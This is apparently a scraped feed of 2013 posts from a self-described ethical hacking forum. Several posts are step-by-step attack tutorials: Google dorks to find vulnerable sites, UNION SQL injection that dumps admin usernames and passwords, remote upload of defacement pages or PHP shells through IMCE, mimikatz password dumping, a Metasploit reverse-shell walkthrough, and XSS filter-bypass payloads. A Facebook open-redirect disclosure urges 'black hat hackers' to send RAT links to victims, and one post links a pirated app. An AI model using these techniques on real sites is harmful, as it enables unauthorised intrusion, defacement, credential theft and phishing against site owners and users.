Hack Community - The Best Ethical Hacking Forums - Hacking Tutorials

Application of Binary search in SQLI

Tue, 18 Jun 2013 11:59:43 +0000

In this tutorial I will show how you can utilize binary search algorithm when hacking. It's not a very long tutorial, but it is an extremely helpful method to use when hacking.

What is the binary search algorithm?

Quote:In computer science, a binary search or half-interval search algorithm finds the position of a specified value (the input "key") within a sorted array. In each step, the algorithm compares the input key value with the key value of the middle element of the array. If the keys match, then a matching element has been found so its index, or position, is returned. Otherwise, if the sought key is less than the middle element's key, then the algorithm repeats its action on the sub-array to the left of the middle element or, if the input key is greater, on the sub-array to the right. If the remaining array to be searched is reduced to zero, then the key cannot be found in the array and a special "Not found" indication is returned.

Source: http://en.wikipedia.org/wiki/Binary_search_algorithm

How to utilize it?

I will be using a fictional SQL injection attack to explain this, so let's imagine we have found a vulnerable website http://www.domain.com/product.php?id=5. The id parameter is vulnerable to union injection and we're going to use order by to find out how many columns it has.

One method would be to start at 1 and count up, but this isn't very efficient if we're working with a lot of columns. This is when we utilize the binary search algorithm.

We start with a high number, in this case 100. If 100 fails we have determined that the correct number will be somewhere between 1 and 100

We will most likely now see an error like Unknown column '100' in 'order clause'

Code:

http://www.domain.com/product.php?id=5 order by 100

Next we try 50. If we get the same error we now know it's also less than 50.

Code:

http://www.domain.com/product.php?id=5 order by 50

Then we try with 25. Again we get the same error. So it's between 1 and 25 as well.

Code:

http://www.domain.com/product.php?id=5 order by 25

We then try with 12, and the error is gone. No errors means that we are not exceeding the total column count. So now we know that it is equal to or higher than 12 and less than 25

Code:

http://www.domain.com/product.php?id=5 order by 12

Since 12 is successful we reverse a little bit and we try 15. If this causes the error to return, the number is between 12 and 15

Code:

http://www.domain.com/product.php?id=5 order by 15

When you are this close you can increase or decrease by one to find the answer

This might look difficult, but when you get the hang of it you will notice that this approach is far more efficient than increase or decrease by one.

Final words

I hope you found this tutorial helpful, and as always, if you have any comments or questions don't hesitate to reply. I will try to answer the best I can.

[Public Disclosure] Facebook Open URL Redirection Vulnerability 2013

Mon, 17 Jun 2013 16:02:45 +0000

Description:
[#] Title : Facebook Open URL Redirection Vulnerability 2013
[#] Status : Unfixed
[#] Severity : High
[#] Works on : Any browser with any version
[#] Author : Arul Kumar.V
[#] Email : arul.xtronix@gmail.com

I have found Open URL Redirection Vulnerability in facebook's dialogs such as "OAuth Dialog","Option Dialog","Friends Dialog".
This Vulnerability is exploitable to all users who are signed into facebook.In this report,I have included some creative technique with parameters to exploit this bug.

Impact of Vulnerability:
1. The user may be redirected to an untrusted page that contains malware which may then compromise the user's machine.

2. The user may be subjected to phishing attacks by being redirected to an untrusted page.

3. This bug can be applicable to any user who are signed in which works at any browsers with any version.

Vulnerable Dialogs:
Option Dialog : (/dialog/optin)
OAuth Dialog : (/dialog/oauth)
Friends Dialog : (/dialog/friends)

Proof Of Concept:
If any signed facebook user clicks any one of the following link,they will be redirected into our desired pages.URL Shorteners can be used to mask malicious links.

Note:You must be signed into a facebook account to redirect sites.

Video:
Watch this video in High Definition(HD) on vimeo

Vulnerable URL's

1) Using "next" Parameter:

Code:

https://www.facebook.com/dialog/optin?app_id==&next=http://google.com

https://www.facebook.com/dialog/oauth?app_id==&next=http://yahoo.com

https://m.facebook.com/dialog/friends?app_id==&next=http://bing.com

2) Using "redirect_uri" Parameter:

Code:

https://www.facebook.com/dialog/optin?app_id==&redirect_uri=http://google.com

https://www.facebook.com/dialog/oauth?app_id==&redirect_uri=http://yahoo.com

https://m.facebook.com/dialog/friends?app_id==&redirect_uri=http://bing.com

For Black Hat Hackers:
Now you can directly send RAT's link,Fake Pages to your victim in Facebook using this Vulnerability by modifying "redirect_uri" Parameter or "next" Parameter.And also URL shorteners to mask your URL.If any of your victim clicked that link,they will be redirected to your malicious page.
You can use this in status updates,messages,comments,etc inside facebook.Facebook will not warn these URL's if anybody clicked it :hehe:

Explanation:
1."app_id" Parameter:
Any value can be given as input into this parameter such as alphabets,numbers,special characters.

Example:
app_id=arul,app_id=000,app_id==

2."next" Parameter:
Both "redirect_uri" and "next" Parameters are same.We can use any one of this parameter.Any malicious sites can be given as input into this Parameter with "http://" which will redirect users to that given malicious site.

Example:
next=http://google.com

Affected Facebook Subdomains:
Both main and mobile site was affected by this vulnerability.It depends upon the dialogs.These are the affected sub-domains in facebook which will vary according to "dialog".Sub domains inlcude mobile,touch,beta-tier and so on.

OAuth Dialog: ( /dialog/oauth )
Just take a look on sub-domains here.Just visit all of these URL's

Code:

https://www.facebook.com/dialog/oauth?app_id==&next=http://www.google.com

https://m.facebook.com/dialog/oauth?app_id==&next=http://www.google.com

https://touch.facebook.com/dialog/oauth?app_id==&next=http://www.google.com

https://beta.facebook.com/dialog/oauth?app_id==&next=http://www.google.com

https://m.beta.facebook.com/dialog/oauth?app_id==&next=http://www.google.com

https://0.facebook.com/dialog/oauth?app_id==&next=http://www.google.com

https://mbasic.facebook.com/dialog/oauth?app_id==&next=http://www.google.com

https://pixel.facebook.com/dialog/oauth?app_id==&next=http://www.google.com

Option Dialog: ( /dialog/optin )

Code:

https://www.facebook.com/dialog/optin?app_id=:&next=http://www.yahoo.com

https://m.facebook.com/dialog/optin?app_id=:&next=http://www.yahoo.com

https://touch.facebook.com/dialog/optin?app_id=:&next=http://www.yahoo.com

https://beta.facebook.com/dialog/optin?app_id=:&next=http://www.yahoo.com

https://m.beta.facebook.com/dialog/optin?app_id=:&next=http://www.yahoo.com

https://0.facebook.com/dialog/optin?app_id=:&next=http://www.yahoo.com

https://mbasic.facebook.com/dialog/optin?app_id=:&next=http://www.yahoo.com

https://pixel.facebook.com/dialog/optin?app_id=:&next=http://www.yahoo.com

Friends Dialog: ( /dialog/friends )

Code:

https://m.facebook.com/dialog/friends?app_id=:&next=http://twitter.com

https://touch.facebook.com/dialog/friends?app_id=:&next=http://twitter.com

https://m.beta.facebook.com/dialog/friends?app_id=:&next=http://twitter.com

https://0.facebook.com/dialog/friends?app_id=:&next=http://twitter.com

https://mbasic.facebook.com/dialog/friends?app_id=:&next=http://twitter.com

My Blogspot:
If you need more details about this bug Visit my blog,

Code:

http://arulxtronix.blogspot.in/2013/06/facebook-open-url-redirection_3515.html

Conclusion:
Finally i have submitted "Open Redirection Vulnerability" with Proof of Concept,Explanation,Instructions.This Vulnerability will works to any facebook user in this universe if they signed in.If you have any queries feel free to contact me at arul.xtronix@gmail.com.Full credits goes to me

Interesting information about SQL Injection

Mon, 17 Jun 2013 11:17:27 +0000

A few days ago I found a good page about MySQL & SQL Injection testing.
The first part of the page is about MySQL Injection, the second part about MSSQL Injection.
http://websec.ca/kb/sql_injection

Aeriagames hacking

Mon, 17 Jun 2013 08:04:54 +0000

Hi guys im a newbie here my name is mikey and i would love to learn the ways off hacking but i have a website account i want to hack in particular aeriagames.com can someone help me get started perhaps?

How To Get Display Recorder (App Store Version FREE)

Sun, 16 Jun 2013 09:34:19 +0000

Introduction
In this tutorial, I'll be teaching you how to get Display Recorder (The App Store Version) for FREE! I know what you're thinking. Can't I just get that off of the 3rd party app stores. No, you cant. None of the IPA's work. You will be using AppCake, but you won't be using any AppCake IPA's. You'll need a few things before you start.

A Jailbroken iPhone
AppCake
iFile

How To Do It
Once you have all 3 of the things listed above, go on to safari, and go to the following link.

Code:

https://dl.dropboxusercontent.com/s/6f1sdsxyy7pbdva/display_recorder_v1.0.ipa?dl=1

Once there, on the top-left of your screen, it should say "Open in...", click that. Then click iFile. When you click that, it will redirect you to AppCake, but relax! That's what it's supposed to do. Now that you're in Appcake, go to your downloads, and choose downloaded. One of your downloaded apps should be the display recorder. Click it, and install it. It should only take a minute or two, and then you have it!

IMCE Remote File Upload Vulnerability

Fri, 14 Jun 2013 05:54:10 +0000

Hello Hack Community.

Through this tutorial, I'm going to teach you how to upload your deface page or maybe even shells on remote servers of websites.

The dork for finding vulnerable websites is : inurl:"/imce?dir=" intitle:"File Browser"

The vulnerable url will be something like this : http://site.com/imce?dir=

Once you open up the URL, it should look like this :

Now, on the left panel, click on the blue folder.
The blue folder is the root and clicking on it, takes you to the root directory. If it says Access Denied, go to another site.

Now, click on the upload button as shown in the screenshot.
Select your deface page in HTML format or shell in PHP format and click on Upload.

After your file is uploaded, it should look like this :

The file you've uploaded will be selected automatically.
To view your deface page, double click on the selected file.
Here's mine :

Spoiler

And you're done!!! Your deface page or shell got uploaded and executed.

Remember, our forum is an ethical hacking forum. Do not abuse, threaten or blackmail the owner of the website through your deface page or shell.
Try as far as possible to keep it ethical.
This tutorial is for educational purposes only. Please do not harm anybody and avoid getting into trouble.

Please do not forget to give feedback.

Hack Windows XP, 7, 8 Passwords

Fri, 14 Jun 2013 04:46:22 +0000

Hello Hack Community,
In this tutorial, I'll be teaching you how to obtain Windows XP, 7 and 8 administrator passwords in plain text.
The only criterion for this to work is, you need to be logged in as the computer administrator.
This is where you need to use your social engineering skills to convince the computer administrator to let you use the administrator account.
First of all, download this :

Code:

http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip

This is the tool we'll be using to obtain the password.
I'm not posting a virus scan for this as every tool of this category is detected as a malicious tool which is actually false.
But, I assure you, this tool is not harmful for your system because I've used it and no harmful effects was observed in my computer.
Here is the official blog of the coder of this tool : http://blog.gentilkiwi.com

So, lets begin.
1. Get access to the administrator account(mentioned before).

2. After you download mimikatz_trunk.zip, extract it.

3. Now navigate it to this folder "mimikatz_trunk-->alpha-->win32" if your OS is 32 bit or "mimikatz_trunk-->alpha-->x64" if your system is 64 bit.

4. Right click on mimikatz.exe and click on Run as Administrator (this is mandatory).

5. Now, on the command line, type "privilege::debug" without quotes and press enter. You'll get a message saying "Privilege '20' OK".

6. Now, type "sekurlsa::logonpasswords" without quotes.

You'll get something like this :

I've whitened my username and password for privacy reasons.

This screenshot is a proof of this method working.

And done!!!
You now have the administrator password!!!

Enjoy hacking!!!!

Please do not forget to give feedback!!

[walkthrough] Kioptix Level 1

Tue, 11 Jun 2013 18:06:09 +0000

[Walkthrough] Kioptix Level 1

I am going to demonstrate how we can pawn Kioptix Level 1 Challenging server.
Kioptix series are well known , made by hackers for hackers.
You can download them at >>

Quote:http://www.kioptix.com

Challenging servers are also called "boot-to-root"
It is safe to test on your own local machine.
Here we go

(0x01) Prepare for battle
We open the vmdk (vm disk) to boot the kioptix.
If everythings fine, you will see the welcome screen of Red hat linux logon.

There may be various way which we can take privilege.
But now I will demonstrate with MSF.

(0x02) Reconnaissance
We must first reconnaissance to our enemy
So I perform a basic nmap

Spoiler

Code:

$. nmap 192.168.37.1/24

Spoiler

Now we could see the general results showing services running along the server.

Spoiler

I marked down the IP and load in the browser to see what we can take advantage.
The front page is merely a test page but wait there are some Links.

Spoiler

Let's follow the links and you will see some mods.

Spoiler

You can see ,they use mod_ssl which we can pawn with Openfuck.c. But right now,
I would take advantage of "netbios-ssn" service along with msf.
So I deep scan again using this cmd

Code:

$. nmap 192.168.37.128 -sV -PN -A

You could see a bunch of ports with services are open.
Take a look at 139 port number.
It's sevice is "samba"!.
So, next....

(0x03) Launch primary weapon
So , I use my nuclear ~ Metasploit.
When I got to msf_console.
I search for exploits naming "samba"

Code:

msf > search "linux samba"

As you can see , a ton of exploits and payloads are shown up.
I looked for linux samba and the exploit name exploit/linux/samba/trans2open.
For now we will use that one.

Spoiler

Code:

msf > use exploit/linux/samba/trans2open

Now, we have to configure the weapon to be maximum level
I started with general options

Code:

msf > show options

As you can see, we have to adjust current settings ...so

Code:

msf > set rhost 192.168.37.128

now , we have to choose which payload we should use.
So..

Code:

msf > show payloads

Spoiler

A ton of payloads are shown up.
I choose linux/x86/shell_reverse_tcp

Code:

msf > set payload linux/x86/shell_reverse_tcp

See options again.

Code:

msf > show options

we have to the local host with our IP.

Code:

msf > set lhost 192.168.37.1

So everything is configured and now we can start our attack.

Code:

msf > exploit

Spoiler

Boom~!!!
We can see shell sessions
type around and play with root

Regards
Mr.Geek@HC:~# logout

How To install Backtrack ON a Virtual Machine

Tue, 11 Jun 2013 06:40:28 +0000

I am using Vmware workstation 9 in this Tutorial

Step 1:

Spoiler

Click on File > Create a New Virtual Machine
Step 2:

Spoiler

Select Typical and click next
Step 3:

Spoiler

Select Installer Disc Image and add the backtrack iso file that you have downloaded
Step 4:

Spoiler

Select other as shown in Image below
Step 5:

Spoiler

Add a name to your Virtual machine and Location to it
Step 6:

Spoiler

Specify the hDD size and use split hdd into multiple files options
Step 7:

Spoiler

In the Image below the ram is 256mb you can increase it or decrease it if you want. to make that changes you need to
Step 8:

Spoiler

I am changing the ram to 1 GB
Step 9:

Spoiler

Click Finish and check the hardware again
Step 10:

Spoiler

The set up of the Virtual machine is complete now we need to install backtrack in that VM.
Click on power on the machine
Step 11:

Spoiler

When the following image appears press enter
Step 12:

Spoiler

Select Default Boot text mode and Press enter
Step 13:

Spoiler

Wait until the following image appears
Step 14:

Spoiler

Type in "startx" to load the GUI
Step 15:

Spoiler

Wait for backtrack to load, Click on install backtrack icon
Step 16:

Spoiler

A following type of window will appear click on Forward
Step 17:

Spoiler

Wait for the system to find your time zone and then click Forward
Step 18:

Spoiler

Select your comfortable type of keyboard layout.Click Forward
Step 19:

Spoiler

I assume that you are new to linux and advise you not to do the partition manually select erase entire disk and use it click on Forward and then in the next window click on install
Step 20:

Spoiler

Wait for the Process to complete.
Step 21:

Spoiler

Wait for the process to complete, It will ask for a reboot do it.
When booted again it will ask for username and password the default username is "root" and pass is "toor".

Then use "startx" to load GUI.

Banner Grabbing(FTP, SSH, and SMTP)

Tue, 11 Jun 2013 05:50:29 +0000

*Not sure if this has been posted before but with a quick search I didn't find anything. This is a post from another forum but is my work.

Banner Grabbing

If you've never heard of banner grabbing before, then I'll explain it for you simply. Banner grabbing is a technique that you can use to get information about what a target is running(service wise). After you discover what ports are open and being used, you may use this technique to find out what kind of software is being run and what version of that software. In this tutorial we are specifically focusing on 3 services: ftp, ssh, and smtp. The reason why we are only mentioning these three services is because banner grabbing these three are the same and don't change in technique at all, though this technique can be used as a part of others. We will be using telnet to do our banner grabbing because it is already installed and available on most OS's.Alternatively you can use netcat or similar if you prefer. Anyway let's get to it.

We will need to open up a console and type the following:

Code:

telnet  

FTP
An ftp example would be:

Code:

telnet 209.197.248.xx 21

which gives us the output:

Our banner:

Code:

220 ProFTPD 1.3.3d Server (ProFTPD) [209.197.248.xx]

SSH
An ssh example would be:

Code:

telnet 174.36.209.xx 22

which gives us the output:

Our banner:

Code:

SSH-2.0-OpenSSH_5.5p1 Debian-6+squeeze1

SMTP
An smtp example would be:

Code:

telnet 206.103.2.xx 25

which gives us the output:

Our banner:

Code:

220 xxxxxxxxxxxxx Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Mon, 18 Jun 2012 20:28:44 -0400

I made a simple python script to do this aswell, as an alternative to telnet

Spoiler

*As a side note you should know that the accuracy of your results depends on the host, most administrators will manipulate their banner to throw you off.

Hacking SMS Messages

Mon, 10 Jun 2013 16:35:33 +0000

Hey guys! Wazzap?
Today I want to present you HOW TO HACK SMS MESSAGE ( HOW TO SEND FREE SMS FROM PC TO MOBILE TO ANY COUNTRY)

I'LL GIVE YOU A VIDEOTUTORIAL AND THE PROGRAM YOU CAN DOWNLOAD FROM THE LINK OF DESCRIPTION!

VIDEO: http://www.youtube.com/watch?v=Hn0FEMrwUgY

Send free FAKE SMS with any NUMBER worldwide [UNLIMITED]

Sun, 09 Jun 2013 17:25:08 +0000

Hello friends now this is possible im not lying and not dreaming its for free..! free ..!and free..!
You can send free sms Worldwide With any mobile number..

If you what this trick pm me for the instructions..

Complete Beginner's Guide to XSS(with Pics)

Sun, 09 Jun 2013 10:17:37 +0000

Note: I will not teach you anything about Cookie Stealing or defacing a website.

What is XSS?
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites accounted for roughly 84% of all security vulnerabilities documented by Symantec as of 2007.
The expression "cross-site scripting" originally referred to the act of loading the attacked, third-party web application from an unrelated attack site, in a manner that executes a fragment of JavaScript prepared by the attacker in the security context of the targeted domain (a reflected or non-persistent XSS vulnerability).

Types of XSS
There is no single, standardized classification of cross-site scripting flaws, but most experts distinguish between at least two primary flavors of XSS: non-persistent and persistent.

Non-persistent
The non-persistent (or reflected) cross-site scripting vulnerability is by far the most common type.These holes show up when the data provided by a web client, most commonly in HTTP query parameters or in HTML form submissions, is used immediately by server-side scripts to parse and display a page of results for and to that user, without properly sanitizing the request.

Persistent
The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping. A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read.

JavaScript and HTML?

JavaScript
JavaScript (JS) is an interpreted computer programming language.It was originally implemented as part of web browsers so that client-side scripts could interact with the user, control the browser, communicate asynchronously, and alter the document content that was displayed.(source: Wikipedia)
Most of your attacks will be tested with JS queries.

HTML
HyperText Markup Language (HTML) is the main markup language for creating web pages and other information that can be displayed in a web browser.
HTML is written in the form of HTML elements consisting of tags enclosed in angle brackets (like ), within the web page content. HTML tags most commonly come in pairs like

and

, although some tags, known as empty elements, are unpaired, for example . The first tag in a pair is the start tag, and the second tag is the end tag (they are also called opening tags and closing tags). In between these tags web designers can add text, tags, comments and other types of text-based content.
(source: Wikipedia)

In the next 2 - 3 examples I will introduce you to the basics of XSS.

Example 1.
This is our first example. I will always start with this query so that I can see what is filtered and what isn't.

Code:

Try to find website that has search box, or any kind of text box where you can inject your script.In the next examples we will use search box. I found mine, entered query and press Search/Go/etc. .(Figure 1. and Figure 2.)

Figure 1.

Figure 2.

Now you may didn't get pop-up box, but that's fine. Let's see our source code and see why did we get pop-up box.(Figure 3.)

Figure 3.

As you can see our query is underlined with red line.(and will always be in this thread). But why did we get pop-up box. Well answer is simple.
Our code was not filtered in any way and we could run our script.In the next examples we will have to bypass filtrations.
In Figure 4. you can see how filtrated code looks like.

Figure 4.

In this example, ", <, and > characters were encoded in XML encoding. Sometimes they will be encoded in HTML encoding, or will be removed.

Example 2.
So again we will try to enter our query(same as in Example 1.) in search box and press Search/Go/etc. .(Figure 5.)

Figure 5.

But we didn't get pop-up box saying Hello. That's because we need to bypass some filtration.Let's see the source code.(Figure 6.)

Figure 6.

As you can see our query is located between title tags and our quotes were filtered and interpreted as input.What now? Here's solution. We should close title tags and try to avoid quotes. Well it's simple to close title tags, in our basic script, at beginning we should add so our query would look like this.

Code:

That's fine but not good enough. We still have to avoid quotes. We would do that by using String.fromCharCode encoding. Here is link where you can do that.Just select Javascript (String.fromCharCode, unescape) and enter your code that is inside alert. In our example that would be "Hello".(with quotes).
And at the end our query would look like this.

Code:

//

As you can see we escaped title tags, we didn't used quotes and at the end we added // so that everything in that line after that would be interpreted as comment.
And we get our pop-up box saying Hello. Let's see source code. (Figure 7.)

Figure 7.

Example 3.
In this example, we will see other examples, and where else your query can be located. In Figure 8. our query is located in value tag and ", < and > were not encoded and that is great, because we can escape value tag and then run our script.

Figure 8.

So how to escape value? We should close value tag, it's that simple. Here is the code.

Code:

">//

At beginning of our query we added "> and that will close value tag.Then or script comes in and at the end // so that everything in that line after that would be interpreted as comment.And here is the source code.(Figure 9.)

Figure 9.

Sometimes our query is already located between script tags, so we can remove our script tags from our script.And then our query would look something like this.

Code:

');alert("Hello");

This is just an example, but it will not always look like this. In Figure 10. you can see how query in script tags lookalike.

Figure 10.

And sometimes our query is filtered/encoded in some places and in other places it isn't. In Figure 11. you can see that in title tags our query isn't filtered and in value tag it is filtered.

Figure 11.

Always look at the source code. If you wanna be good at this, learn JavaScript and HTML.
Recommened:
XSS - Cross Site Scripting [Video Tutorial] by Xecutor (videos from Infinity Exists)
Basic XSS tutorial by Anima Templi
Complete XSS Tutorial by 1234hotmaster

We came to the end of this tutorial.
I hope you like it.

Basic SQL Injection

Sat, 08 Jun 2013 20:58:55 +0000

SQL Injection is by far one of the most common penetration attacks. Its also my favorite and very effective.

Step 1.
Open up google and search inurl:members.php?id=[/b
Step 2.
Click on any of the links and then put a single quote ( ' ) at the end.
Step 3.
If you get an error, like [b]You have an error in your sql syntax, then go to step 4. If not, go back and find another link.
Step 4.
Now you need to know how many columns there are. http://example.com/members.php?id=4/ Will be our example.
Type "order by 10" at the end of the url. http://example.com/members.php?id=4 order by 10.
If you get an error, decrease the number. If nothing happens, increase the number until you get an error.
Say we do ORDER BY 10. No error. So then do ORDER BY 20. We get an error. ORDER BY 15. No error. ORDER BY 16. Error. That means we have 15 columns.
Step 5.
Now we need to find out which columns are vulnerable.
We do this. http://example.com/members.php?id=-4 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15.
You MUST put a negative (-) in front of the value. You should then see numbers in place of the content. Choose one of those numbers. For example, one of them is 14. So to find the version, we just do:
http://example.com/members.php?id=-4 1,2,3,4,5,6,7,8,9,10,11,12,13,VERSION(),15
The version should then be displayed. Now we want to see whats in the database, dont we?
Step 6. http://example.com/members.php?id=-4 1,2,3,4,5,6,7,8,9,10,11,12,13,GROUP_CONCAT(table_name),15 from information_schema.tables where table_name=database()
That displays all the tables in the database. Now, for example, we see this:
admin,news,content
Oh look. A table named admin. Now we want to see the columns in the table admin.
Setp 6.
http://example.com/members.php?id=-4 1,2,3,4,5,6,7,8,9,10,11,12,13,GROUP_CONCAT(column_name),15 from information_schema.columns where table_name=CHAR(097,100,109,105,110)
You need to replace database() with your tablename like: CHAR(tablename in ascii format)(use this:http://personal.projectxxi.com/email_addr_encoder.html)
Also replace "_schema.tables" with "._schema.columns" and the group concat.
You should then see something like: admin_username,admin_password,admin_id,admin_ip
Now what you do to get the username and password is:
http://example.com/members.php?id=-4 1,2,3,4,5,6,7,8,9,10,11,12,13,GROUP_CONCAT(admin_username,0x3a,admin_password),15 from admin--
Congradulations! Now you can see all admin usernames:passwords! Now use this: http://scan.subhashdasyam.com/admin-panel-finder.php To find the admin login page. And now you are admin!

You can get in big trouble with this. Use proxys and DONT USE IS FOR BAD!!!!

From Script Kiddie to a Hacker - A Comprehensive Guide for the Misguided

Sat, 08 Jun 2013 10:41:24 +0000

Hello Hack community, Yet this is one of my other tutorials for all of my fellow Penetration Testers. The reason I've created such a thread is because of these 4 reasons:

1) I feel guilty for people who make fun of Hacking by saying "I can hack you're facebook, Now bow before me!" (Seriously?? )
2) I feel bad for people who can't differentiate between Hacking and Cracking
3) I feel hatred for people who can't tell the difference between a Hacker and a Penetration Tester
4) Last but not the least, I feel awful for people who call themselves "Certified/Professional Ethical or Black hat Hacker" after hacking a Facebook account, A weak WEP Key and atlast opening a Blog with the title "An Ethical Hackers Blog"

Here's something for the people I mentioned above:

Spoiler

These are just the few of my large list of reasons due to which I created this post but before I continue please keep in mind that I will be writing some stuff that might seem offending to you but it isn't because this thread is for awareness.

Here's what we are going to discuss:

1) Who is a "Hacker" ?
2) List of things that are "NOT" Hacking
3) Difference between Hacking and Cracking
4) Actual and Real time Hacking
5) Difference between an Hacker and a Penetration Tester
6) Challenge

1) Who is a Hacker and What is Hacking??

A Hacker is a person who specializes in computer security, Discovers and Exploits the vulnerabilities found using his own set of particular skill, tools and knowledge. A hacker might do such thing for his own purpose or for money or even as a challenge. In this era of technology and cybernet, Many people especially the government think of Hackers as so called Criminals. Well the thing that you should remember is that not all Hackers are criminals. Hackers have types like Black Hats, White Hats and Grey Hats. Out of them Black Hats are considered to be criminals but in this era people take Hackers as a potential threat. Well we are not here to discuss about threat but we are here to discuss the true meaning of a Hacker and Hacking.

There are many meanings of a Hacker like this one from wikipedia:

Code:

A hacker is someone who seeks and exploits weaknesses in a computer system or computer network. Hackers may be motivated by a multitude of reasons, such as profit, protest, or challenge.

For us the true definition if a Hacker would be:

Code:

A person having security analysis and exploitation skills, able to exploit vulnerabilities on a target system by using his own set of Tools and Exploits

Taking the above definition in view, it clearly states that a Hacker uses Tools that he codes and makes Himself. This also indicates that this person has significant knowledge in Programming using which he is able to code his own required tools. Exploitation itself is not easy as it requires constant observation for detecting vulnerabilities and coding an exploit for them which too requires programming as well.

The inverse of a Hacker is a Script Kiddie, uses tools made by others to exploit vulnerabilities.

Point to Ponder?

Now my question is that "Are you a Hacker?" Keep thinking about it and you will figure out

More Deep Stuff

You've noticed that we use tools like Havij, SQLmap, SQLdumper, Hydra, Orphcrack, Metasploit etc to Exploit, Crack and Hack but these tools are built by others. How come we are Hackers when we use tools built by others? We should be called Script Kiddies instead. This is the part where most of the arguments are carried out, We can't stop using the word Hacker for ourselves even if we aren't one. This is not our fault, this is because the meaning of Hacking is being taken in the wrong way and off course the beginners who are eager to do learn hacking in just a blink of an eye. No! Thats not even fucking possible! Just as programming you can't call your self a professional programmer no matter how much you do! Same goes with Hacking.Each and Every day something new gets made and it is designed in such a manner as to provide a 99% possibility of being secure. For that Hackers have to go deep and study more about it.

We hear news that a Bank got Hacked and some vicious amount of money was stolen. It may seem to be easy for n00bies but if you ask the Hackers who have done it you will be amazed by the amount of deep work they had done before carrying out the attack, They had to find out the main bank server, tackle their security protocols, firewalls, IDS etc and for that they had to find out which type of system they were using. Then to study deep about that system, find out a way to tackle it. After getting pass it, now how to get access to the main server and stuff like that. And the most import of the thing is How they stay Anonymous?

Hahaha, Now after reading the above paragraph now think again, "Am I a Hacker?"

Script Kiddie, The wrong part

Now days one can easily be tempted to anger by saying "You are a Script Kiddie!" and there goes the fight and argument! The problem is the same, The meaning of script kiddie is being a person who has no knowledge of anything related to the relevant field. If you read the definition of Script Kiddie:

Code:

A script kiddie (also known as a skid or skiddie) is a non-expert who breaks into computer systems by using pre-packaged automated tools written by others, usually with little understanding of the underlying concept—hence the term script (i.e. a prearranged plan or set of activities) kiddie (i.e. kid, child—an individual lacking knowledge and experience, immature)

It states that a Script Kiddie is a non expert but that doesn't mean he/she has not knowledge or skill, A script Kiddie has concepts and knowledge and more of it than that of a newbie or a n00b. People sometime get angry when one blames over knowledge, No one knows anything to a 100% extent so why can't be admit we are scrip kiddies, I don't see any point or a bad thing in it because:

1) You know your stuff about hacking, exploiting etc (N00b's don't)
2) You can use tools (N00bs can't)
3) You have potential (N00bs don't)
4) You have skills to use them (N00bs don't)
5) You are gaining more knowledge about your relevant field (N00bs are lazy at this point and not you)

and so more!

The point was, Don't be angry when called upon a Script Kiddie, A SK knows much about his real shit rather than a n00b who want to learn the damn shit which are done in years or maybe lifetime, in days. So yeah there's a 101% difference between a N00b and a Script Kiddie and remember

Script Kiddie is not a N00b

2) List of things that are NOT Hacking or even a part of it

People have been merging wrong fields with Hacking as a part of it. Let me tell you one thing that Hacking is way out of your League and by this I mean it's not easy and it takes a lifetime to become an expert in this field but n00bs have taken a wrong turn. They have been considering things on their own as a part of Hacking. Let me list some stuff here for your own explanation:

1) Hacking Facebook, Twitter etc accounts, this is what usually n00bs say but it's actually Cracking so it isn't Hacking. I will discuss the difference between Hacking and Cracking in the next topic

2) Cracking Wifi Passwords is not hacking.

3) Infecting with RAT and get credentials is not Hacking

4) Gaining access to a target OS using already made exploits, tools etc is not Hacking, If you have a problem with this statement. Read the Hacking definition again and don't argue as it's the bare truth and down deep inside you know it

5) Reverse Engineering is not Hacking, It's Cracking

Add more if you want

3) Difference Between Cracking and Hacking

Cracking	Hacking
Illegal side of Hacking	Not Illegal but depends upon in which manner the people use it in
Mainly associated in stealing, breaking passwords, bruteforce accounts, reverse engineering	Mainly focuses on exploiting vulnerabilities on target system and gaining access
Crackers do stuff for popularity mainly	Hackers do stuff for their own purpose like White Hat's Black Hats and Grey Hats
Cracking is true crime because we are not taking permissions here	Ethical Hacking is legal as it involves taking permission on the first basis

4) Real And Actual Hacking Events

One of my favourite hackers from the past is Kevin Mitnick, they are legendary and their work is almost perfection. Unless you read some real time encounter of these hacker you won't be able to get the true spirit of hacking and how it's done. Read this book written my Kevin Mitnick http://deathmule.nullfile.com/documents/taoi.pdf
You'll be amazed at the end of the book!

5) Difference Between Hacker and Penetration Tester

I couldn't describe it much easier than this explanation I found on Wiki:

Code:

According to the EC-Council's Certified Ethical Hacker course documentation the two can be defined as follows;

Penetration Testing:

A goal-oriented project of which the goal is the trophy and includes gaining privileged access by pre-conditional means.

Ethical Hacking:

A penetration test of which the goal is to discover trophies throughout the network within the predetermined project time limit.

For me reading that I would say difference is; a pen-test has a single goal (trophy) and strict procedures that have to be followed to get that trophy, and an ethical hack is a much larger beast that involves many goals or trophies, could last so long it needs to be time restricted, and in general has less limits.

So a pen-test is "one goal, one process" and ethical hacking is "hack everything that can be hacked, ethically"

Challenge

If you think you are the greatest Hacker of all time, then make your computer Hack Proof!

Solution (Only press this button if you failed above)

Spoiler

A Guide Written by Ex094
Some reference taken from Wikipedia and Google

"Erase" yourself online

Fri, 07 Jun 2013 20:50:54 +0000

This tutorial comes as a result of my own carelessness and the need to start "erasing" myself from the internet. I write "erase" in quotes because there's no way you will be able to completely eliminate every single trace of yourself.
The reason for this is because you have no idea of how things has been stored, backed up, copied, etc. When deleting an account it might not even be deleted at all. It might just be changing a single value in the database.
But the goal with this tutorial is to help you remove as much as possible. The process in theory is simple, but the practical task is hard, time consuming, and boring.

Gathering information
The very first thing you will have to do is to gather as much information as possible about yourself. You need to find all the profiles you're currently using, and the ones you've had in the past.
To do this you need to search for anything about yourself that you can think of. A list of obvious search queries is

Full name
Usernames (all you can remember)
Phone number (current and old ones)
Email addresses (current and old ones)
Date of birth
Places you've lived / visited + your name
Websites you've left comments on

You should also try to search for various combinations of the information listed above. Real name + username, username + date of birth, real name + phone number, email + real name, etc.
To do this you should use at least Google and Pipl. The activity logs on social networks are also helpful in this process.

